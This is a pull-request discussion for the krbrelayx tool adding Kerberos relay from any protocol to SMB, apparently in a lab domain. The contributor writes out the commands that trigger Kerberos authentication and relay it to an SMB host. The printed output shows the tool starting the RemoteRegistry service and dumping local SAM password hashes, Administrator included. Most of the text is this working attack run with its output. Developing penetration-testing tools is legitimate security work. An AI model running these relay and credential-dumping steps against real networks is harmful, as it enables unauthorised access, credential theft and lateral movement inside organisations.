Add Kerberos relay support for * -> SMB

[hugo-syn]

Hi @dirkjanm, as discussed here is my implementation for relaying all protocols to SMB.

First trigger the authentication:

$ smbclient.py -dc-ip 10.42.0.5 -target-ip 127.0.0.1 -k -no-pass "DEV.LOCAL/[email protected]"

Then relay:

$ python3 krbrelayx.py -t smb://bast01.dev.local
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 127.0.0.1
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x156a35f4f55f1455cc86052ac65cbaf9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done dumping SAM hashes for host: bast01.dev.local
[*] Stopping service RemoteRegistry

I took the code from impacket for the kerberos authentication part from an AP_REQ you can compare it:

• https://github.com/fortra/impacket/blob/af51dfd1e0bf4472200b4a2d560cd70df7904f9c/impacket/smb.py#L3148
• https://github.com/fortra/impacket/blob/af51dfd1e0bf4472200b4a2d560cd70df7904f9c/impacket/smb3.py#L692

I've implemented it for SMB1 and SMB2/3 however I did not test this against SMBv1.

[dirkjanm]

I will need to find some time to test this, but merging it in for now, thanks for the great work!